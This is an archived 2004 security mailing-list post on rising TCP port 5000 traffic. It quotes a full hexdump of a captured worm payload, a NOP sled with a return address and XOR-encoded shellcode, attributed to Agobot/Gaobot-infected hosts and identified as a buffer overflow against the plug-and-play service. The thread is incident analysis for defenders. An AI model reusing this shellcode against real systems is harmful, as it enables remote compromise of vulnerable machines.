|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: TCP port 5000 syn increasing
From: Noel Cuillandre (n.cuillandre
wanadoo.fr)
Date: Mon May 17 2004 - 16:08:39 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
It's a buffer overflow attack on the plug and play service on TCP port
5000.
The hexdump corresponds to a SQLSlammer's like worm.
Noel Cuillandre
Paul Schmehl a écrit :
>----- Original Message -----
>From: "ANDREW STREULE" <brother_wolfbtopenworld.com>
>To: <incidentssecurityfocus.com>
>Sent: Monday, May 17, 2004 2:24 PM
>Subject: Re: TCP port 5000 syn increasing
>
>
>
>
>>on my honeypot a port 5000 event is almost always
>>followed by 1 or 2 nbt smb events.
>>
>>
>>
>Here's a hexdump of what I'm seeing on 5000. The ones I'm seeing are coming
>from boxes infected with Agobot/Gaobot and not just 81.x.x.x.
>
>00000000 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>00000010 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>00000020 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>00000030 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>00000040 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>00000050 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>00000060 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>00000070 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>00000080 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>00000090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>000000A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>000000B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>000000C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>000000D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>000000E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>000000F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>00000100 90 90 90 90 90 90 90 90 90 90 90 90 4D 3F E3 77 ............M?.w
>00000110 90 90 90 90 FF 63 64 90 90 90 90 90 90 90 90 90 .....cd.........
>00000120 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>00000130 90 90 90 90 90 90 90 90 EB 10 5A 4A 33 C9 66 B9 ..........ZJ3.f.
>00000140 66 01 80 34 0A 99 E2 FA EB 05 E8 EB FF FF FF 70 f..4...........p
>00000150 99 98 99 99 C3 21 95 69 64 E6 12 99 12 E9 85 34 .....!.id......4
>00000160 12 D9 91 12 41 12 EA A5 9A 6A 12 EF E1 9A 6A 12 ....A....j....j.
>00000170 E7 B9 9A 62 12 D7 8D AA 74 CF CE C8 12 A6 9A 62 ...b....t......b
>00000180 12 6B F3 97 C0 6A 3F ED 91 C0 C6 1A 5E 9D DC 7B .k...j?.....^..{
>00000190 70 C0 C6 C7 12 54 12 DF BD 9A 5A 48 78 9A 58 AA p....T....ZHx.X.
>000001A0 50 FF 12 91 12 DF 85 9A 5A 58 78 9B 9A 58 12 99 P.......ZXx..X..
>000001B0 9A 5A 12 63 12 6E 1A 5F 97 12 49 F3 9A C0 71 E5 .Z.c.n._..I...q.
>000001C0 99 99 99 1A 5F 94 CB CF 66 CE 65 C3 12 41 F3 9D ...._...f.e..A..
>000001D0 C0 71 F0 99 99 99 C9 C9 C9 C9 F3 98 F3 9B 66 CE .q............f.
>000001E0 69 12 41 5E 9E 9B 99 9E 24 AA 59 10 DE 9D F3 89 i.A^....$.Y.....
>000001F0 CE CA 66 CE 6D F3 98 CA 66 CE 61 C9 C9 CA 66 CE ..f.m...f.a...f.
>00000200 65 1A 75 DD 12 6D AA 42 F3 89 C0 10 85 17 7B 62 e.u..m.B......{b
>00000210 10 DF A1 10 DF A5 10 DF D9 5E DF B5 98 98 99 99 .........^......
>00000220 14 DE 89 C9 CF CA CA CA F3 98 CA CA 5E DE A5 FA ............^...
>00000230 F4 FD 99 14 DE A5 C9 CA 66 CE 7D C9 66 CE 71 AA ........f.}.f.q.
>00000240 59 35 1C 59 EC 60 C8 CB CF CA 66 4B C3 C0 32 7B Y5.Y.`....fK..2{
>00000250 77 AA 59 5A 71 62 67 66 66 DE FC ED C9 EB F6 FA w.YZqbgff.......
>00000260 D8 FD FD EB FC EA EA 99 DA EB FC F8 ED FC C9 EB ................
>00000270 F6 FA FC EA EA D8 99 DC E1 F0 ED C9 EB F6 FA FC ................
>00000280 EA EA 99 D5 F6 F8 FD D5 F0 FB EB F8 EB E0 D8 99 ................
>00000290 EE EA AB C6 AA AB 99 CE CA D8 CA F6 FA F2 FC ED ................
>000002A0 D8 99 FB F0 F7 FD 99 F5 F0 EA ED FC F7 99 F8 FA ................
>000002B0 FA FC E9 ED 99 0D 0A 0D 0A .........
>
>Paul Schmehl (paulsutdallas.edu)
>Adjunct Information Security Officer
>The University of Texas at Dallas
>AVIEN Founding Member
>http://www.utdallas.edu/~pauls/
>
>
>---------------------------------------------------------------------------
>----------------------------------------------------------------------------
>
>
>
>
---------------------------------------------------------------------------
----------------------------------------------------------------------------
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]